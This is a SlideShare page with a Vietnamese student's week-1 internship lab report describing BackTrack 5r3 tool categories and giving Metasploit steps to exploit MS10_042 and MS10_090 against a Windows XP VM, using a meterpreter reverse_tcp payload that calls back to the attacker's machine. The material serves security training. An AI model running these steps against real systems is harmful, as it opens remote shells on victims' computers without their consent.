SlideShare a Scribd company logo
1 of 3
Họ Tên: Đỗ Liên Hán
Trường: Đại Học Quốc Tế
Báo Cáo Tuần 1
Các Vấn Đề Của Tuần Thứ 1:
1.Nhận tài liệu và gặp giáo viên hướng dẫn
2.Cài đặt backtrack 5r3
3.Thực hành làm quen với backtrack qua 2 lỗi
MS10_090 và MS10_042
I. Backtrack là gì?
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm
thâm nhập. Trong các định dạng Live DVD, có thể sử dụng Backtrack trực tiếp từ DVD
hoặc cài đặt trên máy và sử dụng như một hệ điều hành. Backtrack hỗ trợ một cách nhanh
chóng cho việc tìm kiếm và cập nhật cơ sở dữ liệu các công cụ bảo mật. Backtrack có lịch
sử phát triển qua nhiều bản Linux khác nhau (phiên bản hiện nay sử dụng bản phân phối
Slackware Linux) và liên tục cập nhập các công cụ, drivers qua các phiên bản… Công cụ
kiểm thử bảo mật trong Backtrack có thể được phân loại thành các nhóm như sau:
Information gathering: Sử dụng để có được thông tin liên quan đến một mục tiêu DNS, địa
chỉ email, trang web, máy chủ mail….
Network mapping: Quét thăm dò, bao gồm việc kiểm tra các host đang tồn tại, thông tin về
hệ điều hành, ứng dụng được sử dụng bởi mục tiêu….
Vulnerability identification: Quét các lỗ hổng, phân tích Server Message Block (SMB) và
Simple Network Management Protocol (SNMP).
Web application analysis: Theo dõi, giám sát các ứng dụng web.
Radio network analysis: Kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến
(RFID).
Penetration: Khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu.
Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục
tiêu, các công cụ trong loại này có thể sử dụng để leo thang đặc quyền.
Maintaining access: Duy trì quyền truy cập vào các máy tính mục tiêu. Những đặc quyền
cao nhất là điều kiện cần thiết trước khi có thể cài đặt công cụ để duy trì quyền truy cập.
Voice Over IP (VOIP): Các công cụ để phân tích VOIP.
Digital forensics: Phân tích hình ảnh đĩa cứng, cấu trúc các tập tincó thể chọn Start
Backtrack Forensics trong trình đơn khởi động.
Reverse engineering: Gỡ rối chương trình hoặc tháo rời tập tin thực thi.
II. Các bước thực hiện lỗi MS10_042 và MS10_090:
a. Lỗi MS10_042:
1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP.
2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole.
3. Sau đó dung lệnh search ms10_042 đễ tìm kiếm module.
4. Kế tiếp dùng lệnh use
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec.
5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần
thiết cho mã lỗi.
6. Thiết lập các thông tin cần thiết như:
(1) Set srvhost [IP của máy backtrack]
(2) Set lhost [IP của máy backtrack]
(3) Set payload windows/meterpreter/reverse_tcp
7. Dùng lệnh exploit để triển khai.
8. Sau cùng là chờ máy nạn nhân truy cập vào địa chỉ đã exploit.
b. Lỗi MS10_090:
1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP.
2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole.
3. Sau đó dung lệnh search ms10_090 đễ tìm kiếm module.
4. Kế tiếp dùng lệnh use exploit/windows/browser/ms10_090_ie_css_clip.
5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần
thiết cho mã lỗi.
6. Thiết lập các thông tin cần thiết như:
(1) Set srvhost [IP của máy backtrack]
(2) Set lhost [IP của máy backtrack]
(3) Set payload windows/meterpreter/reverse_tcp
7. Dùng lệnh exploit để triển khai.
8. Sau cùng là chờ máy nạn nhân truy cập vào đường dẫn đã exploit.
Demo cho 2 lỗi trên tại link:
MS10_042 ở tại trang: http://youtu.be/Vk5697U2dMg
MS10_090 ở tại trang: http://youtu.be/t3rewc4tcCw

More Related Content

What's hot

Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcLoc Tran
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System HackingHuynh Khang
 
Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật QuangSecurity Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật QuangSecurity Bootcamp
 
Beezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo
 
Metasploit_Khiem_Quang
Metasploit_Khiem_QuangMetasploit_Khiem_Quang
Metasploit_Khiem_Quangrenlue
 
Slide báo cáo
Slide báo cáoSlide báo cáo
Slide báo cáoblue_abc
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingv7q3t
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linuxHường Tô
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hackingHuynh Khang
 
Bao cao thuc tap athena tuan 1 2-3
Bao cao thuc tap athena tuan 1 2-3Bao cao thuc tap athena tuan 1 2-3
Bao cao thuc tap athena tuan 1 2-3HoangHai930705
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetthach28
 
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Trọng An
 
XXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng HưngXXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng HưngVõ Thái Lâm
 

What's hot (20)

Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn LộcSlide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
 
Slide báo cáo: System Hacking
Slide báo cáo: System HackingSlide báo cáo: System Hacking
Slide báo cáo: System Hacking
 
Botnet slide
Botnet slideBotnet slide
Botnet slide
 
Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật QuangSecurity Bootcamp 2013 -  Tấn công bằng mã độc - Trương Minh Nhật Quang
Security Bootcamp 2013 - Tấn công bằng mã độc - Trương Minh Nhật Quang
 
Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2
 
Beezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke DeserializeBeezo Share - Donetnuke Deserialize
Beezo Share - Donetnuke Deserialize
 
Metasploit_Khiem_Quang
Metasploit_Khiem_QuangMetasploit_Khiem_Quang
Metasploit_Khiem_Quang
 
Bao cao tuan 2
Bao cao tuan 2Bao cao tuan 2
Bao cao tuan 2
 
Kali linux
Kali linuxKali linux
Kali linux
 
Slide báo cáo
Slide báo cáoSlide báo cáo
Slide báo cáo
 
Tuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hackingTuan vq bao cao thuc tap_ system hacking
Tuan vq bao cao thuc tap_ system hacking
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
 
Báo cáo system hacking
Báo cáo system hackingBáo cáo system hacking
Báo cáo system hacking
 
1
11
1
 
Bao cao thuc tap athena tuan 1 2-3
Bao cao thuc tap athena tuan 1 2-3Bao cao thuc tap athena tuan 1 2-3
Bao cao thuc tap athena tuan 1 2-3
 
Báo cáo tuần 1
Báo cáo tuần 1Báo cáo tuần 1
Báo cáo tuần 1
 
Botnet slide
Botnet slideBotnet slide
Botnet slide
 
Xâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internetXâm nhập điện thoại android qua vps trên internet
Xâm nhập điện thoại android qua vps trên internet
 
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
Tạo mã độc trên kali linux để xâm nhập android (mạng lan )
 
XXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng HưngXXE injection - Nguyễn Tăng Hưng
XXE injection - Nguyễn Tăng Hưng
 

Viewers also liked

Case Study: Priority Health IT Alignment
Case Study: Priority Health IT AlignmentCase Study: Priority Health IT Alignment
Case Study: Priority Health IT AlignmentMatt Heusser
 
Historiaparaninos4antiguagrecia 120202142550-phpapp01
Historiaparaninos4antiguagrecia 120202142550-phpapp01Historiaparaninos4antiguagrecia 120202142550-phpapp01
Historiaparaninos4antiguagrecia 120202142550-phpapp01Jose Edwin Linares Alvarado
 
La piattaforma di servizi di monitoraggio che il CSI sta sviluppando . Stato ...
La piattaforma di servizi di monitoraggio che il CSI sta sviluppando . Stato ...La piattaforma di servizi di monitoraggio che il CSI sta sviluppando . Stato ...
La piattaforma di servizi di monitoraggio che il CSI sta sviluppando . Stato ...CSI Piemonte
 
Digital collaboration with machine-readable sign language text in the SignWri...
Digital collaboration with machine-readable sign language text in the SignWri...Digital collaboration with machine-readable sign language text in the SignWri...
Digital collaboration with machine-readable sign language text in the SignWri...Stephen Slevinski
 
Villa Romana Del Casale
Villa Romana Del CasaleVilla Romana Del Casale
Villa Romana Del Casaleadam dim
 
Real World Budgets -- AASL Preconference, ALA 2013
Real World Budgets -- AASL Preconference, ALA 2013Real World Budgets -- AASL Preconference, ALA 2013
Real World Budgets -- AASL Preconference, ALA 2013Wendy Stephens
 
Learn Build eCommerce Web
Learn Build eCommerce WebLearn Build eCommerce Web
Learn Build eCommerce WebMuhammad Akbar
 
Btv thesis defense_v1.02-final
Btv thesis defense_v1.02-finalBtv thesis defense_v1.02-final
Btv thesis defense_v1.02-finalVinh Bui
 
Thu hát cho người - Vũ Đức sao Biển
Thu hát cho người - Vũ Đức sao BiểnThu hát cho người - Vũ Đức sao Biển
Thu hát cho người - Vũ Đức sao BiểnNguyenHoang92002
 
Mitos Matematika Pics
Mitos Matematika PicsMitos Matematika Pics
Mitos Matematika Picsguest1600643
 
7天连锁酒店营销方案(p4 p部分)
7天连锁酒店营销方案(p4 p部分)7天连锁酒店营销方案(p4 p部分)
7天连锁酒店营销方案(p4 p部分)Mike Lionheart
 
Informal Learning Centre In Uk Report
Informal Learning Centre In Uk ReportInformal Learning Centre In Uk Report
Informal Learning Centre In Uk ReportBrent MacKinnon
 
10 типичных ошибок в ведении салонного бизнеса
10 типичных ошибок в ведении салонного бизнеса10 типичных ошибок в ведении салонного бизнеса
10 типичных ошибок в ведении салонного бизнесаElena Sapogova
 
Presentacion el significado del dinero
Presentacion el significado del dineroPresentacion el significado del dinero
Presentacion el significado del dineroPFI SPAIN ®
 

Viewers also liked (19)

Case Study: Priority Health IT Alignment
Case Study: Priority Health IT AlignmentCase Study: Priority Health IT Alignment
Case Study: Priority Health IT Alignment
 
Historiaparaninos4antiguagrecia 120202142550-phpapp01
Historiaparaninos4antiguagrecia 120202142550-phpapp01Historiaparaninos4antiguagrecia 120202142550-phpapp01
Historiaparaninos4antiguagrecia 120202142550-phpapp01
 
Advertising director
Advertising directorAdvertising director
Advertising director
 
La piattaforma di servizi di monitoraggio che il CSI sta sviluppando . Stato ...
La piattaforma di servizi di monitoraggio che il CSI sta sviluppando . Stato ...La piattaforma di servizi di monitoraggio che il CSI sta sviluppando . Stato ...
La piattaforma di servizi di monitoraggio che il CSI sta sviluppando . Stato ...
 
Digital collaboration with machine-readable sign language text in the SignWri...
Digital collaboration with machine-readable sign language text in the SignWri...Digital collaboration with machine-readable sign language text in the SignWri...
Digital collaboration with machine-readable sign language text in the SignWri...
 
Excellence in Business Awards
Excellence in Business AwardsExcellence in Business Awards
Excellence in Business Awards
 
Bullitt Presentation
Bullitt PresentationBullitt Presentation
Bullitt Presentation
 
Villa Romana Del Casale
Villa Romana Del CasaleVilla Romana Del Casale
Villa Romana Del Casale
 
Real World Budgets -- AASL Preconference, ALA 2013
Real World Budgets -- AASL Preconference, ALA 2013Real World Budgets -- AASL Preconference, ALA 2013
Real World Budgets -- AASL Preconference, ALA 2013
 
Learn Build eCommerce Web
Learn Build eCommerce WebLearn Build eCommerce Web
Learn Build eCommerce Web
 
Btv thesis defense_v1.02-final
Btv thesis defense_v1.02-finalBtv thesis defense_v1.02-final
Btv thesis defense_v1.02-final
 
Thu hát cho người - Vũ Đức sao Biển
Thu hát cho người - Vũ Đức sao BiểnThu hát cho người - Vũ Đức sao Biển
Thu hát cho người - Vũ Đức sao Biển
 
Mitos Matematika Pics
Mitos Matematika PicsMitos Matematika Pics
Mitos Matematika Pics
 
18 03-2015 du lịch cát vàng
18 03-2015 du lịch cát vàng18 03-2015 du lịch cát vàng
18 03-2015 du lịch cát vàng
 
Meda Flute Catalogo
Meda Flute CatalogoMeda Flute Catalogo
Meda Flute Catalogo
 
7天连锁酒店营销方案(p4 p部分)
7天连锁酒店营销方案(p4 p部分)7天连锁酒店营销方案(p4 p部分)
7天连锁酒店营销方案(p4 p部分)
 
Informal Learning Centre In Uk Report
Informal Learning Centre In Uk ReportInformal Learning Centre In Uk Report
Informal Learning Centre In Uk Report
 
10 типичных ошибок в ведении салонного бизнеса
10 типичных ошибок в ведении салонного бизнеса10 типичных ошибок в ведении салонного бизнеса
10 типичных ошибок в ведении салонного бизнеса
 
Presentacion el significado del dinero
Presentacion el significado del dineroPresentacion el significado del dinero
Presentacion el significado del dinero
 

Similar to Report athena week 1

Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaÂu Dương Bình
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huyhoaihuysc
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctapLong Prồ
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2Con Ranh
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1Con Ranh
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananhVũ Anh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1Anhh Hữu
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýQuý Đồng Nast
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýQuý Đồng Nast
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲkakawpah0911
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲphanconghien
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnThái Tuấn Lưu
 
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdffile_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdfBcNguynQuang1
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1kakawpah0911
 

Similar to Report athena week 1 (20)

Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang KhoaBao cao thuc tap tuan 1 Athena Tran Dang Khoa
Bao cao thuc tap tuan 1 Athena Tran Dang Khoa
 
Bao cao thuc tap nguyen hoai huy
Bao cao thuc tap   nguyen hoai huyBao cao thuc tap   nguyen hoai huy
Bao cao thuc tap nguyen hoai huy
 
Bao caothuctap
Bao caothuctapBao caothuctap
Bao caothuctap
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2SYSTEM HACKING - TUẦN 2
SYSTEM HACKING - TUẦN 2
 
SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1SYSTEM HACKING - TUẦN 1
SYSTEM HACKING - TUẦN 1
 
Vu tuananh
Vu tuananhVu tuananh
Vu tuananh
 
Báo cáo lần 1
Báo cáo lần 1Báo cáo lần 1
Báo cáo lần 1
 
Kali Linux
Kali LinuxKali Linux
Kali Linux
 
Bai bao cao 3
Bai bao cao 3Bai bao cao 3
Bai bao cao 3
 
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh QuýBáo cáo thực tập - Lần 1 - Hoàng Thanh Quý
Báo cáo thực tập - Lần 1 - Hoàng Thanh Quý
 
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh QuýTổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
Tổng kết Báo cáo thực tập Athena - Hoàng Thanh Quý
 
BÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲBÁO CÁO THỰC TẬP - GIỮA KỲ
BÁO CÁO THỰC TẬP - GIỮA KỲ
 
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲBÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
BÁO CÁO THỰC TẬP ATHENA - BÁO CÁO GIỮA KỲ
 
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái TuấnTÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
TÌM HIỂU VỀ METASPLOIT TRONG KALI LINUX - Thái Tuấn
 
Bao cao
Bao caoBao cao
Bao cao
 
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdffile_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
file_1_mot_so_ky_thuat_tan_cong_mang_pptx_0046.pdf
 
BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1BÁO CÁO THỰC TẬP - TUẦN 1
BÁO CÁO THỰC TẬP - TUẦN 1
 
Tuan 3
Tuan 3Tuan 3
Tuan 3
 
Baocaocuoiki
BaocaocuoikiBaocaocuoiki
Baocaocuoiki
 

Report athena week 1

  • 1. Họ Tên: Đỗ Liên Hán Trường: Đại Học Quốc Tế Báo Cáo Tuần 1 Các Vấn Đề Của Tuần Thứ 1: 1.Nhận tài liệu và gặp giáo viên hướng dẫn 2.Cài đặt backtrack 5r3 3.Thực hành làm quen với backtrack qua 2 lỗi MS10_090 và MS10_042
  • 2. I. Backtrack là gì? Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử nghiệm thâm nhập. Trong các định dạng Live DVD, có thể sử dụng Backtrack trực tiếp từ DVD hoặc cài đặt trên máy và sử dụng như một hệ điều hành. Backtrack hỗ trợ một cách nhanh chóng cho việc tìm kiếm và cập nhật cơ sở dữ liệu các công cụ bảo mật. Backtrack có lịch sử phát triển qua nhiều bản Linux khác nhau (phiên bản hiện nay sử dụng bản phân phối Slackware Linux) và liên tục cập nhập các công cụ, drivers qua các phiên bản… Công cụ kiểm thử bảo mật trong Backtrack có thể được phân loại thành các nhóm như sau: Information gathering: Sử dụng để có được thông tin liên quan đến một mục tiêu DNS, địa chỉ email, trang web, máy chủ mail…. Network mapping: Quét thăm dò, bao gồm việc kiểm tra các host đang tồn tại, thông tin về hệ điều hành, ứng dụng được sử dụng bởi mục tiêu…. Vulnerability identification: Quét các lỗ hổng, phân tích Server Message Block (SMB) và Simple Network Management Protocol (SNMP). Web application analysis: Theo dõi, giám sát các ứng dụng web. Radio network analysis: Kiểm tra mạng không dây, bluetooth và nhận dạng tần số vô tuyến (RFID). Penetration: Khai thác các lỗ hổng tìm thấy trong các máy tính mục tiêu. Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy tính mục tiêu, các công cụ trong loại này có thể sử dụng để leo thang đặc quyền. Maintaining access: Duy trì quyền truy cập vào các máy tính mục tiêu. Những đặc quyền cao nhất là điều kiện cần thiết trước khi có thể cài đặt công cụ để duy trì quyền truy cập. Voice Over IP (VOIP): Các công cụ để phân tích VOIP. Digital forensics: Phân tích hình ảnh đĩa cứng, cấu trúc các tập tincó thể chọn Start Backtrack Forensics trong trình đơn khởi động. Reverse engineering: Gỡ rối chương trình hoặc tháo rời tập tin thực thi.
  • 3. II. Các bước thực hiện lỗi MS10_042 và MS10_090: a. Lỗi MS10_042: 1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP. 2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole. 3. Sau đó dung lệnh search ms10_042 đễ tìm kiếm module. 4. Kế tiếp dùng lệnh use exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec. 5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần thiết cho mã lỗi. 6. Thiết lập các thông tin cần thiết như: (1) Set srvhost [IP của máy backtrack] (2) Set lhost [IP của máy backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. Dùng lệnh exploit để triển khai. 8. Sau cùng là chờ máy nạn nhân truy cập vào địa chỉ đã exploit. b. Lỗi MS10_090: 1. Khởi động VMWare với 2 cửa sổ backtrack và windows XP. 2. Ở cửa sổ backtrack, khởi động cửa sổ terminal và gõ lệnh msfconsole. 3. Sau đó dung lệnh search ms10_090 đễ tìm kiếm module. 4. Kế tiếp dùng lệnh use exploit/windows/browser/ms10_090_ie_css_clip. 5. Ta dùng lệnh show options để kiểm tra các thông tin thuộc tính cần thiết cho mã lỗi. 6. Thiết lập các thông tin cần thiết như: (1) Set srvhost [IP của máy backtrack] (2) Set lhost [IP của máy backtrack] (3) Set payload windows/meterpreter/reverse_tcp 7. Dùng lệnh exploit để triển khai. 8. Sau cùng là chờ máy nạn nhân truy cập vào đường dẫn đã exploit. Demo cho 2 lỗi trên tại link: MS10_042 ở tại trang: http://youtu.be/Vk5697U2dMg MS10_090 ở tại trang: http://youtu.be/t3rewc4tcCw